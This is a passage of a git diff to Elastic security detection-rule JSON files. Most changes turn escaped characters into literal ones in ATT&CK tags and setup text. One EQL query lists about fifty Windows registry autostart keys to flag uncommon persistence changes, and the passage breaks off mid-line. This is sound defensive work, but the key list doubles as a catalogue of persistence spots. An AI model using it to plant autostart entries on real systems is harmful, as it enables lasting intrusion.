@@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n 
\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal 
Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n 
\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json index ff0624c4416..8ad079a44d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json 
+++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json index b1056759273..8bf6c1a5c4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json index 043c4241e56..f09d395ef5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json index dd1aa28aaa0..97f608fffd8 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json index cec534bf993..f738725e48b 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json index 1263e52c267..f945e19959c 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json index a0c8319ec95..c2340eb08e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json index 2487ff310c0..2d996eb19ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json index 16e29ea9afa..86e476fab9a 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json index 87d8ba708e5..be02ed121bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_103.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json index 6499139e8f7..0ec75e3428d 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_104.json @@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json index b7affe27f04..1f8c5318e24 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_105.json 
@@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json index 7a0a68ebd86..168bf18d394 100644 --- a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_106.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", - "setup": "\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nSystem \u003e\nAudit Security System Extension (Success)\n```\n", + "setup": "\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json index 8b71c8d1d03..d877ee973cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_104.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json index 4f10f280810..68bf67998ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_105.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json index 8b1125fe504..c7529d2cab0 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_106.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE 